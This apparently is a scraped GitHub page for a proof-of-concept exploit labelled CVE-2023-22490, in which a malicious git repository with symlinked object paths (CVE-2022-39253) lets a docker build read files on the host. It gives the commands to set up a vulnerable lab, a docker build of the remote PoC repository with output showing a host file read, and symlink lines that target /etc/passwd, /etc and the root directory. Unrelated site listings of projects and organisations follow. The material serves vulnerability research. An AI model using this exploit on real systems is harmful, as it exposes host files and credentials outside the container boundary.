cve-2023-22490's Introduction

docker host file read (using cve-2022-39253) poc

PoC

reproduce environment

$ docker run --name=cve-2022-39253 -ti -d ssst0n3/docker_archive:git_cve-2022-39253
$ docker attach --detach-keys ctrl-x cve-2022-39253
# (use ctrl-x to exit container's terminal)
# (wait minutes for environment starting ...)
...
Ubuntu 22.04 LTS ubuntu ttyS0

ubuntu login: root
Password: root

root@ubuntu:~# apt list --installed |grep "git/now"

WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

git/now 1:2.34.1-1ubuntu1.2 amd64 [installed,upgradable to: 1:2.34.1-1ubuntu1.6]

root@ubuntu:~# docker --version
Docker version 20.10.19, build d85ef84

echo "*************escaped*************" > /tmp/escaped
docker build https://github.com/ssst0n3/docker-cve-2022-39253-poc.git#main

Sending build context to Docker daemon    234kB
Step 1/4 : FROM busybox
latest: Pulling from library/busybox
45a0cdc5c8d3: Pull complete 
Digest: sha256:3b3128d9df6bbbcc92e2358e596c9fbd722a437a62bafbc51607970e9e3b8869
Status: Downloaded newer image for busybox:latest
 ---> 334e4a014c81
Step 2/4 : COPY / /
 ---> 9f2e7d6efffd
Step 3/4 : RUN ls -lah /.git/modules/evil/objects/host
 ---> Running in e21e9a9c8294
-rw-r--r--    1 root     root           8 Dec 21 02:26 /.git/modules/evil/objects/host
Removing intermediate container e21e9a9c8294
 ---> c87453ca2a37
Step 4/4 : RUN cat /.git/modules/evil/objects/host
 ---> Running in a0463dca30b7
*************escaped*************
Removing intermediate container a0463dca30b7
 ---> 2330735e84e4
Successfully built 2330735e84e4

How to read other file or directory

ln -s /etc/passwd evil2/git/objects/host

ln -s /etc evil2/git/objects/host

You can even read the root directory /.

Security Advisories

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.

Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

TensorFlow

An Open Source Machine Learning Framework for Everyone

Django

The Web framework for perfectionists with deadlines.

Laravel

A PHP framework for web artisans

D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

web

Some thing interesting about web. New door for the world.

server

A server is a program made to process requests and deliver data to clients.

Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

Visualization

Some thing interesting about visualization, use data art

Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.

Microsoft

Open source projects and samples from Microsoft.

Google

Google ❤️ Open Source for everyone.

Alibaba

Alibaba Open Source for everyone

D3

Data-Driven Documents codes.

Tencent

China tencent open source team.

0ahu / cve-2023-22490 Goto Github PK